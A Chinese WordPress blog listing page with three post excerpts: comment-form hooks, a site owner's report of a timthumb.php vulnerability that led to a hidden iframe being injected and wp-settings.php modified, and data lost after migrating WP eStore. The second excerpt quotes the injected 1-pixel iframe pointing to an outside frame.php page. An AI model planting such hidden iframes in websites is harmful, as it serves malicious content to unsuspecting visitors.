WP笔记

如何通过钩子函数向WordPress评论表单中添加任意内容

WordPress评论表单可以通过钩子函数(Hooks)添加或者修改内容,wordprss 3.2中,评论表单通过comment_form()函数输出,这个函数一般写在comments.php中。可以使用的filters和actions如下:

WordPress Comment Filters:

  • comment_form_default_fields
  • comment_form_defaults
  • comment_form_logged_in
  • comment_form_field_{$name}
继续阅读如何通过钩子函数向WordPress评论表单中添加任意内容
WP笔记

timthumb漏洞导致iframe攻击,wp-settings.php被修改

wordpress主题中一个很常用的处理图片的工具timthumb.php因为远程存储文件时候的验证上不足而产生了漏洞,允许在cache文件夹中执行一些php脚本,这已经不是什么秘密,可我就是中了招。 某天打开网站,发现服务器上所有的wordpress网站在firefox中都会打开一个弹出窗口,提示下载frame.php,这应该不是代码本意,不知道我的firefox出了啥问题,其实是在源代码里多了隐藏的iframe,用firebug查看源代码,可以看到下面的内容

<iframe id="iframe" src="%20http://counter-wordpress.com/frame.php" style="width: 1px; height: 1px;">

继续阅读timthumb漏洞导致iframe攻击,wp-settings.php被修改
WP笔记

WP eStore移植后数据全部丢失

今天折腾的WP网站装了个收费的ecommerce插件,叫WP eStore,说实话感觉这个插件并不比免费的强大多少,还是很多人买。按照移植WordPress的方法折腾完,看起来很不错一切都没问题,访问到Store页面的时候,问题来了,eStore的shortcode报错,说指定的id不存在咋回事。

继续阅读WP eStore移植后数据全部丢失